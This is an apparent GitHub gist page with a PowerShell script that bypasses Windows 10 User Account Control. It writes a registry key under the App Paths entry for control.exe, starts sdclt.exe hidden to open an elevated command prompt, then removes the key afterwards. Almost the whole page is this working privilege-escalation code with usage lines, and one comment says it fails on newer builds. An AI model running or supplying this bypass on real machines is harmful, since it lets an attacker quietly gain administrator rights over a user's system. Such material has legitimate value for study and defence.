Skip to content

Instantly share code, notes, and snippets.

Last active May 11, 2021 08:56
  • Star 17 You must be signed in to star a gist
  • Fork 6 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
Bypass UAC via sdclt in Windows 10 systems
This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10.
Author: @netbiosX
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
and starts an elevated command prompt.
Function : SdcltUACBypass
File Name : SdcltUACBypass.ps1
Website :
Open Command Prompt (it's default):
Open specific application:
SdcltUACBypass -program "cmd.exe"
function SdcltUACBypass(){
Param (
[String]$program = "C:\Windows\System32\cmd.exe" #default
#Create Registry Structure
New-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Name "(default)" -Value $program -Force
#Start sdclt.exe
Start-Process "C:\Windows\System32\sdclt.exe" -WindowStyle Hidden
Start-Sleep 3
Remove-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Recurse -Force
Copy link

ghost commented Apr 15, 2019

doesn't work in new Windows 10 versions

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment